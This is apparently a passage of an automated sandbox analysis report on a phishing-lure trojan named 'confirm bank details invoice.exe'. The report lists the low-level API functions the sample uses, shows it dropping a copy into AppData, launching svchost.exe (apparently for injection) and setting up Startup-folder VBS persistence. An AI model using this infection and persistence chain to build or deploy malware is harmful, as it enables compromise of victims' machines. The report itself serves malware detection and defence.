                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672BF0 NtAllocateVirtualMemory,3_2_03672BF0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672BA0 NtEnumerateValueKey,3_2_03672BA0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672B80 NtQueryInformationFile,3_2_03672B80
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672AF0 NtWriteFile,3_2_03672AF0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672AD0 NtReadFile,3_2_03672AD0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672AB0 NtWaitForSingleObject,3_2_03672AB0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672F60 NtCreateProcessEx,3_2_03672F60
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672F30 NtCreateSection,3_2_03672F30
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672FE0 NtCreateFile,3_2_03672FE0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672FA0 NtQuerySection,3_2_03672FA0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672FB0 NtResumeThread,3_2_03672FB0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672F90 NtProtectVirtualMemory,3_2_03672F90
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672E30 NtWriteVirtualMemory,3_2_03672E30
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672EE0 NtQueueApcThread,3_2_03672EE0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672EA0 NtAdjustPrivilegesToken,3_2_03672EA0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672E80 NtReadVirtualMemory,3_2_03672E80
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672D30 NtUnmapViewOfSection,3_2_03672D30
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672D00 NtSetInformationFile,3_2_03672D00
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672D10 NtMapViewOfSection,3_2_03672D10
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672DD0 NtDelayExecution,3_2_03672DD0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672DB0 NtEnumerateKey,3_2_03672DB0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672C60 NtCreateKey,3_2_03672C60
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672C70 NtFreeVirtualMemory,3_2_03672C70
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672C00 NtQueryInformationProcess,3_2_03672C00
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672CF0 NtOpenProcess,3_2_03672CF0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672CC0 NtQueryVirtualMemory,3_2_03672CC0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672CA0 NtQueryInformationToken,3_2_03672CA0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03673010 NtOpenDirectoryObject,3_2_03673010
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03673090 NtSetValueKey,3_2_03673090
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036739B0 NtGetContextThread,3_2_036739B0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03673D70 NtOpenThread,3_2_03673D70
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03673D10 NtOpenProcessToken,3_2_03673D10
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004B6606: CreateFileW,DeviceIoControl,CloseHandle,0_2_004B6606
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004AACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_004AACC5
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004B79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_004B79D3
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D679D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_00D679D3
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_0049B0430_2_0049B043
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004832000_2_00483200
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_00483B700_2_00483B70
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004A410F0_2_004A410F
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004902A40_2_004902A4
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_0047E3E30_2_0047E3E3
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004A038E0_2_004A038E
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004A467F0_2_004A467F
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004906D90_2_004906D9
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004DAACE0_2_004DAACE
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004A4BEF0_2_004A4BEF
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_0049CCC10_2_0049CCC1
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_0047AF500_2_0047AF50
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_00476F070_2_00476F07
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_0048B11F0_2_0048B11F
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_0049D1B90_2_0049D1B9
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004D31BC0_2_004D31BC
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004A724D0_2_004A724D
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_0049123A0_2_0049123A
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004B13CA0_2_004B13CA
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004793F00_2_004793F0
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_0048F5630_2_0048F563
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004BB6CC0_2_004BB6CC
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004796C00_2_004796C0
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004DF7FF0_2_004DF7FF
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004777B00_2_004777B0
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004A79C90_2_004A79C9
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_0048FA570_2_0048FA57
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_00479B600_2_00479B60
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_00477D190_2_00477D19
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_0048FE6F0_2_0048FE6F
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_00499ED00_2_00499ED0
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_00477FA30_2_00477FA3
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_013433880_2_01343388
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D4B0432_2_00D4B043
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D332002_2_00D33200
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D33B702_2_00D33B70
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D5410F2_2_00D5410F
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D402A42_2_00D402A4
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D5038E2_2_00D5038E
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D2E3B02_2_00D2E3B0
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D406D92_2_00D406D9
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D5467F2_2_00D5467F
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D8AACE2_2_00D8AACE
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D54BEF2_2_00D54BEF
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D4CCC12_2_00D4CCC1
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D2AF502_2_00D2AF50
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D26F072_2_00D26F07
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D831BC2_2_00D831BC
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D4D1B92_2_00D4D1B9
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D3B11F2_2_00D3B11F
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D5724D2_2_00D5724D
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D4123A2_2_00D4123A
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D613CA2_2_00D613CA
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D293F02_2_00D293F0
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D3F5632_2_00D3F563
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D296C02_2_00D296C0
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D6B6CC2_2_00D6B6CC
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D8F7FF2_2_00D8F7FF
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D277B02_2_00D277B0
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D579C92_2_00D579C9
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D3FA572_2_00D3FA57
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D29B602_2_00D29B60
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D27D192_2_00D27D19
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D49ED02_2_00D49ED0
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D3FE6F2_2_00D3FE6F
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D27FA32_2_00D27FA3
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_018E28982_2_018E2898
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004011D03_2_004011D0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004101EA3_2_004101EA
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0042F1F33_2_0042F1F3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004101F33_2_004101F3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00416BDE3_2_00416BDE
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00416BE33_2_00416BE3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040E3F33_2_0040E3F3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004024003_2_00402400
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004104133_2_00410413
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040E5433_2_0040E543
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040E53D3_2_0040E53D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00402EE03_2_00402EE0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036FA3523_2_036FA352
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0364E3F03_2_0364E3F0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_037003E63_2_037003E6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036E02743_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036C02C03_2_036C02C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036C81583_2_036C8158
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036301003_2_03630100
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036DA1183_2_036DA118
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036F81CC3_2_036F81CC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036F41A23_2_036F41A2
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_037001AA3_2_037001AA
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036D20003_2_036D2000
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036407703_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036647503_2_03664750
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0363C7C03_2_0363C7C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0365C6E03_2_0365C6E0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036405353_2_03640535
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_037005913_2_03700591
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036F24463_2_036F2446
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036E44203_2_036E4420
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036EE4F63_2_036EE4F6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036FAB403_2_036FAB40
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036F6BD73_2_036F6BD7
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0363EA803_2_0363EA80
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036569623_2_03656962
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036429A03_2_036429A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0370A9A63_2_0370A9A6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0364A8403_2_0364A840
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036428403_2_03642840
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0366E8F03_2_0366E8F0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036268B83_2_036268B8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B4F403_2_036B4F40
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03682F283_2_03682F28
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03660F303_2_03660F30
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036E2F303_2_036E2F30
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0364CFE03_2_0364CFE0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03632FC83_2_03632FC8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036BEFA03_2_036BEFA0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03640E593_2_03640E59
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036FEE263_2_036FEE26
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036FEEDB3_2_036FEEDB
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03652E903_2_03652E90
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036FCE933_2_036FCE93
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0364AD003_2_0364AD00
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036DCD1F3_2_036DCD1F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0363ADE03_2_0363ADE0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03658DBF3_2_03658DBF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03640C003_2_03640C00
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03630CF23_2_03630CF2
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036E0CB53_2_036E0CB5
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0362D34C3_2_0362D34C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036F132D3_2_036F132D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0368739A3_2_0368739A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036E12ED3_2_036E12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0365B2C03_2_0365B2C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036452A03_2_036452A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0367516C3_2_0367516C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0362F1723_2_0362F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0370B16B3_2_0370B16B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0364B1B03_2_0364B1B0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036F70E93_2_036F70E9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036FF0E03_2_036FF0E0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036EF0CC3_2_036EF0CC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036470C03_2_036470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036FF7B03_2_036FF7B0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036856303_2_03685630
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036F16CC3_2_036F16CC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036F75713_2_036F7571
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_037095C33_2_037095C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036DD5B03_2_036DD5B0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036314603_2_03631460
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036FF43F3_2_036FF43F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036FFB763_2_036FFB76
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B5BF03_2_036B5BF0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0367DBF93_2_0367DBF9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0365FB803_2_0365FB80
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B3A6C3_2_036B3A6C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036FFA493_2_036FFA49
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036F7A463_2_036F7A46
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036EDAC63_2_036EDAC6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036DDAAC3_2_036DDAAC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03685AA03_2_03685AA0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036E1AA33_2_036E1AA3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036499503_2_03649950
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0365B9503_2_0365B950
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036D59103_2_036D5910
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036AD8003_2_036AD800
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036438E03_2_036438E0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036FFF093_2_036FFF09
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036FFFB13_2_036FFFB1
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03641F923_2_03641F92
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03649EB03_2_03649EB0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036F7D733_2_036F7D73
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03643D403_2_03643D40
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036F1D5A3_2_036F1D5A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0365FDC03_2_0365FDC0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B9C323_2_036B9C32
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036FFCF23_2_036FFCF2
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: String function: 00D3EC2F appears 68 times
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: String function: 00D46AC0 appears 42 times
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: String function: 00D4F8A0 appears 35 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036AEA12 appears 86 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03675130 appears 58 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036BF290 appears 105 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0362B970 appears 280 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03687E54 appears 111 times
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: String function: 0048EC2F appears 68 times
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: String function: 00496AC0 appears 42 times
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: String function: 0049F8A0 appears 35 times
                  Source: confirm bank details invoice.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@10/6@0/0
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004BCE7A GetLastError,FormatMessageW,0_2_004BCE7A
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004AAB84 AdjustTokenPrivileges,CloseHandle,0_2_004AAB84
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004AB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_004AB134
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D5AB84 AdjustTokenPrivileges,CloseHandle,2_2_00D5AB84
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D5B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_00D5B134
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004BE1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_004BE1FD
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004B6532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_004B6532
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004CC18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_004CC18C
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_0047406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_0047406B
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeFile created: C:\Users\user\AppData\Local\VevinaJump to behavior
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeFile created: C:\Users\user\AppData\Local\Temp\autC696.tmpJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs"
                  Source: confirm bank details invoice.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: confirm bank details invoice.exeReversingLabs: Detection: 34%
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeFile read: C:\Users\user\Desktop\confirm bank details invoice.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\confirm bank details invoice.exe "C:\Users\user\Desktop\confirm bank details invoice.exe"
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeProcess created: C:\Users\user\AppData\Local\Vevina\deblaterate.exe "C:\Users\user\Desktop\confirm bank details invoice.exe"
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\confirm bank details invoice.exe"
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Vevina\deblaterate.exe "C:\Users\user\AppData\Local\Vevina\deblaterate.exe"
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Vevina\deblaterate.exe"
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeProcess created: C:\Users\user\AppData\Local\Vevina\deblaterate.exe "C:\Users\user\Desktop\confirm bank details invoice.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\confirm bank details invoice.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Vevina\deblaterate.exe "C:\Users\user\AppData\Local\Vevina\deblaterate.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Vevina\deblaterate.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeSection loaded: cryptsp.dllJump to behavior
